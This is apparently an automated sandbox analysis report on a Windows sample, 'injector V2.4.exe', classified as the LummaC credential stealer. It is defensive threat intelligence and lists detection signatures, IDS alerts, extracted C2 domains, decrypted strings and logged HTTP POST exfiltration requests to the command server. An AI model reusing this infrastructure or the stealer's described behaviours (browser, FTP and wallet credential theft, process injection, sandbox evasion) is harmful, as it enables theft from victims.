Edit tour

Windows Analysis Report
injector V2.4.exe

Overview

General Information

Sample name:	injector V2.4.exe
Analysis ID:	1560307
MD5:	837840f37e344f8e7bc187f88f93c4a8
SHA1:	782edf606d07812ec71254cc9cf2260da2e3fd51
SHA256:	02ec8860240f90b920bb2692f651d0ec712e511e0bd17a3b1048382fdfdcb4d8
Tags:	exeuser-4k95m
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

injector V2.4.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: 837840F37E344F8E7BC187F88F93C4A8)

conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

injector V2.4.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: 837840F37E344F8E7BC187F88F93C4A8)

injector V2.4.exe (PID: 1492 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: 837840F37E344F8E7BC187F88F93C4A8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "fumblingactor.cyou", "processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: injector V2.4.exe PID: 1492	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: injector V2.4.exe PID: 1492	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: injector V2.4.exe PID: 1492	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T16:51:59.946351+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	172.67.219.199	443	TCP
2024-11-21T16:52:02.044217+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	172.67.219.199	443	TCP
2024-11-21T16:52:04.519436+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	172.67.219.199	443	TCP
2024-11-21T16:52:06.697059+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	172.67.219.199	443	TCP
2024-11-21T16:52:09.534774+0100	2028371	3	Unknown Traffic	192.168.2.5	49714	172.67.219.199	443	TCP
2024-11-21T16:52:12.576375+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	172.67.219.199	443	TCP
2024-11-21T16:52:14.933335+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	172.67.219.199	443	TCP
2024-11-21T16:52:18.362746+0100	2028371	3	Unknown Traffic	192.168.2.5	49726	172.67.219.199	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T16:52:00.661859+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49710	172.67.219.199	443	TCP
2024-11-21T16:52:02.776657+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49711	172.67.219.199	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T16:52:00.661859+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49710	172.67.219.199	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T16:52:02.776657+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49711	172.67.219.199	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T16:52:13.294353+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49715	172.67.219.199	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T16:52:14.962103+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49716	172.67.219.199	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: injector V2.4.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://fumblingactor.cyou:443/api	Avira URL Cloud: Label: malware
Source: https://fumblingactor.cyou/api	Avira URL Cloud: Label: malware
Source: https://fumblingactor.cyou/api;	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "fumblingactor.cyou", "processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"]}

Multi AV Scanner detection for submitted file

Source: injector V2.4.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.7% probability

Machine Learning detection for sample

Source: injector V2.4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: p3ar11fter.sbs
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 3xp3cts1aim.sbs
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: peepburry828.sbs
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: p10tgrace.sbs
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: processhol.sbs
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fumblingactor.cyou
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 4_2_0041941E CryptUnprotectData,

4_2_0041941E

Source: injector V2.4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49716 version: TLS 1.2

Source: injector V2.4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B4F680 FindFirstFileExW,	0_2_00B4F680
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B4F731
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B4F680 FindFirstFileExW,	3_2_00B4F680
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00B4F731

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 1B6183F2h	4_2_0040DBCA
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h]	4_2_004394C0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ecx, eax	4_2_0042E573
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+66h]	4_2_0040CE25
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0042EED9
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov byte ptr [edx], al	4_2_0042EED9
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00423050
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp al, 2Eh	4_2_00429055
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ecx, eax	4_2_0041B87A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 933FB3DAh	4_2_0041B87A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx eax, byte ptr [edx+ebx*2]	4_2_0041D834
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7D5D6260h	4_2_0041C03D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	4_2_0041C03D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then lea ecx, dword ptr [eax+24h]	4_2_0041B09F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	4_2_0041E8A1
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	4_2_0041C951
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov edx, ecx	4_2_0043A170
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then push eax	4_2_0040A130
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_004241D0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	4_2_0042D9F4
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ecx, eax	4_2_0042E986
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_0042C9A0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-01h]	4_2_0042A24C
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax	4_2_00407A50
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]	4_2_00407A50
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then lea ecx, dword ptr [eax+24h]	4_2_0041CA5F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	4_2_00424A6F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	4_2_0041CA0C
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ebx, bx	4_2_004272DE
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then lea ecx, dword ptr [eax+24h]	4_2_0041B09F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-01h]	4_2_0042A299
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ecx, eax	4_2_0040A35B
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then lea eax, dword ptr [ebx+ebx]	4_2_0041DB1F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then xor byte ptr [esp+eax+08h], al	4_2_0041D3F0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0042F39A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov esi, edx	4_2_0042BBA5
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then lea ecx, dword ptr [eax+24h]	4_2_0041A45E
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov edx, eax	4_2_0041EC60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov edx, ecx	4_2_00439C60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6AAA525Ah]	4_2_0040D46E
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0042C410
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov byte ptr [edi], bl	4_2_00409430
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ebx, bx	4_2_004272DE
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-6868FAC4h]	4_2_0042BDC6
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then push edi	4_2_0041A643
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00427E47
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+0Ch]	4_2_004096C0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ebp, eax	4_2_00405E90
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ecx, eax	4_2_0040AF50
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then mov ecx, edi	4_2_00439F60
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_004367A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49711 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49715 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49710 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49716 -> 172.67.219.199:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: peepburry828.sbs
Source: Malware configuration extractor	URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor	URLs: fumblingactor.cyou
Source: Malware configuration extractor	URLs: processhol.sbs
Source: Malware configuration extractor	URLs: p10tgrace.sbs
Source: Malware configuration extractor	URLs: p3ar11fter.sbs

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49726 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.219.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.219.199:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fumblingactor.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: fumblingactor.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J6HYNMF79F9LGP59V7AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12848Host: fumblingactor.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BUIRWLP4LYVPBVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15060Host: fumblingactor.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C1QY4W1ZKUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20526Host: fumblingactor.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U0YBS5GLCGU18GRPDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: fumblingactor.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OWS7AAIK91User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569214Host: fumblingactor.cyou

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fumblingactor.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fumblingactor.cyou

Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: injector V2.4.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: injector V2.4.exe, 00000004.00000003.2253728589.0000000000502000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.0000000000502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: injector V2.4.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: injector V2.4.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: injector V2.4.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: injector V2.4.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: injector V2.4.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: injector V2.4.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: injector V2.4.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: injector V2.4.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: injector V2.4.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: injector V2.4.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
